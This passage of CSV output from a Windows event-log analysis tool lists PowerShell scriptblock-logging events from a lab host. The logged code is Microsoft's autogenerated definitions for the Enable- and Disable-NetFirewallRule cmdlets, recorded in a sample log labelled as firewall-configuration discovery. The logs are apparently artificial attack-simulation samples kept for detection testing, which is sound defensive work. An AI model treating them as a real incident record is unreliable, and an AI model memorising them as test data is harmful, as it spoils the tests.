ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdlet",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 